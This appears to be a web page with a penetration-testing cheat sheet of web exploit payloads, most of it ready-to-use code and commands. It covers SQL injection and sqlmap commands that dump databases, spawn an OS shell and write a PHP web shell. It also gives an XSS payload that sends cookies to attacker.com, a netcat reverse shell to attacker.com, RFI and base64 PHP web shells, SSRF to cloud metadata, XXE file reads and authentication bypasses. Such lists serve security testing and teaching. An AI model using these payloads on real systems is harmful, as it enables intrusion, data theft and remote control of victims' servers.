Skip to content

Web Exploits

SQL Injection

Manual Testing

# Basic tests
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #

SQLMap

# Basic scan
sqlmap -u "http://target.com/page?id=1"

# With POST data
sqlmap -u "http://target.com/login" --data="username=admin&password=pass"

# Specify parameter
sqlmap -u "http://target.com/page?id=1" -p id

# Database enumeration
sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
sqlmap -u "http://target.com/page?id=1" -D database_name --dump

# Dump specific table
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --dump

# Get shell
sqlmap -u "http://target.com/page?id=1" --os-shell

# Read file
sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd"

# Write file
sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

Also:

  • Review conversations in Burp
  • Export request
  • sqlmap -r request.req

Cross-Site Scripting (XSS)

Basic Payloads

<!-- Basic alert -->
<script>alert('XSS')</script>

<!-- Image tag -->
<img src=x onerror=alert('XSS')>

<!-- SVG -->
<svg onload=alert('XSS')>

<!-- Body tag -->
<body onload=alert('XSS')>

<!-- Cookie stealing -->
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>

XSS Tools

# XSStrike
xsstrike -u "http://target.com/page?param=value"

# Dalfox
dalfox url "http://target.com/page?param=value"

Command Injection

Basic Payloads

# Command chaining
; ls
& ls
&& ls
| ls
|| ls

# Command substitution
`ls`
$(ls)

# Common injections
127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | nc attacker.com 4444 -e /bin/bash

File Inclusion

Local File Inclusion (LFI)

# Basic LFI
http://target.com/page.php?file=../../../../etc/passwd

# With null byte (PHP < 5.3)
http://target.com/page.php?file=../../../../etc/passwd%00

# PHP wrappers
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=index.php
http://target.com/page.php?file=php://input

# Log poisoning
http://target.com/page.php?file=../../../../var/log/apache2/access.log

Remote File Inclusion (RFI)

# Basic RFI
http://target.com/page.php?file=http://attacker.com/shell.txt

# Data URI
http://target.com/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

File Upload Exploits

Bypassing Restrictions

# Extension bypasses
shell.php
shell.php.jpg
shell.php%00.jpg
shell.php;.jpg
shell.php%0a.jpg

# Content-Type manipulation
Content-Type: image/jpeg

# Magic bytes
GIF89a; <?php system($_GET['cmd']); ?>

Server-Side Request Forgery (SSRF)

# Internal network scan
http://target.com/fetch?url=http://192.168.1.1

# Cloud metadata
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/

# File reading
http://target.com/fetch?url=file:///etc/passwd

XML External Entity (XXE)

<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

<!-- Blind XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/xxe">
]>
<root>&xxe;</root>

Deserialization Attacks

# ysoserial (Java)
java -jar ysoserial.jar CommonsCollections1 'command' | base64

# PHP deserialization
O:8:"MyClass":1:{s:4:"cmd";s:10:"cat /etc/passwd";}

Authentication Bypass

# SQL injection
admin' --
admin' #
' OR '1'='1' --

# NoSQL injection
{"username": {"$ne": null}, "password": {"$ne": null}}

# JWT manipulation
# Decode, modify, re-encode JWT tokens